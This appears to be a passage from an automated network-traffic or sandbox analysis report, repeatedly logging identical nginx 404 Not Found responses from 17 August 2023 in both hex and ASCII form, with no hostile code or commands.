                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:52 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:32:56 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:14 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
